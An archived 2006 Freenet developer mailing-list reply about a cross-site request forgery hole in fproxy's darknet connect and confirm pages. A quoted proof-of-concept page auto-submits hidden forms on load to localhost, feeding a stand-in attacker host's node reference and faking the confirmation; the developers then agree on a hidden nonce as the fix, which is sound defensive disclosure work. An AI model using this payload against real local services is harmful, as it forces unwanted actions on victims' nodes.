Re: [freenet-dev] Javascript Disconnect?

Fri, 02 Jun 2006 05:48:55 -0700 

On Fri, Jun 02, 2006 at 01:41:55PM +0100, Michael Rogers wrote:
> Matthew Toseland wrote:
> >So not only can it not read a frame from a different domain, it can't
> >open one in a hidden iframe and then submit it either?
> 
> The script doesn't need to submit the same confirmation returned by the 
> server - it can just fake it like it did with the original form.

Well, yes, but if it can't do that, could it open the page in a subframe
and then submit that?
> 
> Something like this:
> 
> ...
> <script type='text/javascript'>
> function submitFirst() {
>       document.forms['form'].submit();
>       window.setTimeout ('submitSecond()', 2000);
> }
> function submitSecond() {
>       document.forms['confirmation'].submit();
> }
> </script>
> </head>
> <body onload='submitFirst()'>
> <form name='form' action='http://localhost:8888/darknet/' method='post' 
> enctype='multipart/form-data' target='hidden_iframe'>
> <input name='url' type='hidden' value='http://mallory.net/ref.txt' />
> <input name='connect' type='hidden' value='Connect' />
> </form>
> <form name='confirmation' action='http://localhost:8888/confirm/' 
> method='post' enctype='multipart/form-data' target='hidden_iframe'>
> <input name='areYouSure' type='hidden' value='Yes' />
> </form>
> ...
> 
> As far as I can see, the only way to prevent this is to put a nonce in a 
> hidden field in the form. If the nonce doesn't match when the form is 
> submitted, ignore the request and maybe alert the user.

Right. So we reconfirm dangerous operations (especially if the referer
is set to somewhere outside fproxy), with a hidden field. Will implement
that soon.
> 
> Cheers,
> Michael
> _______________________________________________
> Devl mailing list
> [email protected]
> http://emu.freenetproject.org/cgi-bin/mailman/listinfo/devl
> 

-- 
Matthew J Toseland - [EMAIL PROTECTED]
Freenet Project Official Codemonkey - http://freenetproject.org/
ICTHUS - Nothing is impossible. Our Boss says so.

Attachment: signature.asc
Description: Digital signature

_______________________________________________
Devl mailing list
[email protected]
http://emu.freenetproject.org/cgi-bin/mailman/listinfo/devl

Reply via email to